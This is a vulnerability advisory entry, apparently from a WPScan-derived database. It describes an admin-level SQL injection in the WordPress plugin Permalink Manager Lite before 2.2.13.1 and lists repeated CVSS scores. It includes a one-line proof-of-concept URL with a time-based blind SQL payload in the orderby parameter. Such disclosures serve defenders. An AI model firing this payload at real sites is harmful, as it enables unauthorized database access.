Lucene search

K
wpvulndbAnton SarsadskikhWPVDB-ID:A2F211AF-5373-425F-9964-EBBF5EFDE87B
HistorySep 27, 2021 - 12:00 a.m.

Permalink Manager Lite < 2.2.13.1 - Admin+ SQL Injection

2021-09-2700:00:00
Anton Sarsadskikh
wpscan.com
6

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

6.5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

The plugin does not validate and escape the orderby parameter before using it in a SQL statement in the Permalink Manager page, leading to a SQL Injection

PoC

https://example.com/wp-admin/tools.php?page=permalink-manager&amp;orderby;=ID+AND+(SELECT+9480+FROM+(SELECT(SLEEP(5)))EXid)

CPENameOperatorVersion
permalink-managerlt2.2.13.1

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

6.5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

Related for WPVDB-ID:A2F211AF-5373-425F-9964-EBBF5EFDE87B